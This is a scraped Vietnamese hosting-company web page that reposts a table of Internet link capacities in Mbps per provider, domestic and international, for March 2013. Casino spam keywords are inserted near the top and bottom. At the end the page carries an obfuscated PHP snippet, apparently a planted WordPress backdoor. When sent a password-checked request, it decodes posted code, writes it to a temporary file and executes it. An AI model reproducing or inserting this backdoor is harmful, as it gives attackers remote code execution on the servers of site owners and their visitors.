Thống kê Dung lượng kênh và hướng kết nối Internet tháng 3/2013 - Máy Chủ Việt Nam
jeu plinko avis pin up catcasino vavada официальный jucky jet

Thống kê Dung lượng kênh và hướng kết nối Internet tháng 3/2013

Ngày 12/05/2013 đăng bởi seo3.VS [email protected]

Theo thông kê của http://vnta.gov.vn

( 28/12/2011 12:41 SA  )
 

Đơn vị

Hướng kết nối

Dung lượng(Mbps)

Tổng dung lượng

(Mbps)

KẾT NỐI TRONG NƯỚC

SPT VNIX 4000 9000
VINA DATA 1000
FPT 2000
VTN 2000
NETNAM CMC 4000 14000
HTC 2000
VNIX 2000
VNPT 3000
SPT 2000
VTC 1000
HTC VNIX 2000 4000
VNPT 2000
QTSC SPT 1050 4985
VIETTEL 1310
VNPT 550
VTN 1000
FPT 1075
VIETTEL VNIX 24000 70000
VTN 15000
VTC 11000
VNG 20000
FPT Telecom VIETTEL 23552 150520
VTN 30720
VTC 12280
VNPT 40960
FPT 40960
VNIX 2048
VNPT VIETTEL 20000 40000
VNIX 20000
VTC VNIX 20000 21000
VNPT 1000
VNG FPT 42000 95000
SCTV 1000
VNIX 10000
VTN 42000
SCTV CMC 2000 6000
VNPT 2000
VNIX 2000
GDS VNIX 2048 2388
VTN 315
FPT 25
DTS FPT 200 2398
VIETTEL 150
CMC 1024
VNIX 1024
VTN VNIX 12000 12000
CCVN FPT 218 623
VNPT 405
CMC Telecom VTC 2048 40960
GDS 1024
VIETTEL 11264
QTSC 1024
FPT 2048
CMC 2048
NGT 1024
VNG 3072
VNPT 2048
VNIX 7168
PAVN 1024
ODS 1024
SPT 2048
LCS 1024
VNPT 3072
Minh Tú GTEL 500 1500
SCTV 1000
Newlife VTN 1024 2048
VNIX 1024
INET FPT 100 1100
VNIX 1000
ODS VNIX 1000 1000
VietTEL-IDC VIETTEL 20480 20480
VDC-NET2E VNPT 2000 2000
Vinadata VNIX 10000 10000
ThanhnienNet VTN 1000 1050
SPT 50
INCOM CCVN 122 122

KẾT NỐI QUỐC TẾ

SPT FPT-IXP 2000 8000
IPLC AAG MEGA-I 2500
VN-US 2000
GOOGLE PEERING 1000
IP TRANSIT_VN_HKG 500
HTC HGC_HONGKONG 300 900
PCCW_HONGKONG 600
NETNAM VNPT-G_HONGKONG 1000 2000
NTT_JAPAN 1000
VIETTEL CHINATELECOM_CHINA 620 142780
NTT_JAPAN 9920
GOOGLE_SINGAPO 2500
TATA_US 19920
CABLE&WIRELESS_UK 10000
EQNIX_SINGAPO 1000
STARHUB_SINGAPO 620
TELSTRA_AUSTRALIA 10000
LIMELIGHT_SINGAPO 1000
GOOGLE_US 10000
AKAMAI_US 10000
MICROSOFT_US 1000
YAHOO_US 1000
HKBN_HONGKONG 1000
LIMELIGHT_JAPAN 10000
HKIX_HONGKONG 2000
EQNIX_HONGKONG 1000
GOOGLE_HONGKONG 51200
FPT Telecom NTT_HONGKONG 2560 88576
TATA_HONGKONG 2560
TATA_HONGKONG 8192
KT_HONGKONG 2560
EQNIX_HONGKONG 10240
LIMELIGHT_HONGKONG 10240
AKAMAI_HONGKONG 10240
MICROSOFT_HONGKONG 4096
YAHOO_HONGKONG 1024
PCCW_HONGKONG 10240
SINGTEL_HONGKONG 7680
CABLE&WIRELESS_HONGKONG 5120
STARHUB_SINGAPO 2560
SINGTEL_SINGAPO 2560
CHINANET_CHINA 5120
HKIX_HONGKONG 1024
PCCW_HONGKONG 2560
VNPT SINGTEL_SINGAPO 5000 136000
NTT_JAPAN 2500
VNPT-G_HONGKONG 50000
VNPT-G_US 30000
VNPT-G_SINGAPO 5000
CHINATELECOM_CHINA 10000
EQNIX_HONGKONG 10000
GOOGLE_HONGKONG 7500
DEUSTCHE TELECOM_US 10000
CHINAUNICOM_CHINA 1000
TINET_US 5000
CMC Telecom IP-TINET-HK-MEGA-I 2560 11884
HGC_HONGKONG 2560
NTT_HONGKONG 1024
SINGTEL_HONGKONG 620
CABLE&WIRELESS_HONGKONG 2560
GOOGLE_HONGKONG 2560
VietTEL-IDC CHT_TAIWAN 155 155
DTS HUTCHISON_HONGKONG 10 10
VTC HONGKONG 120 240
USA 120
.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}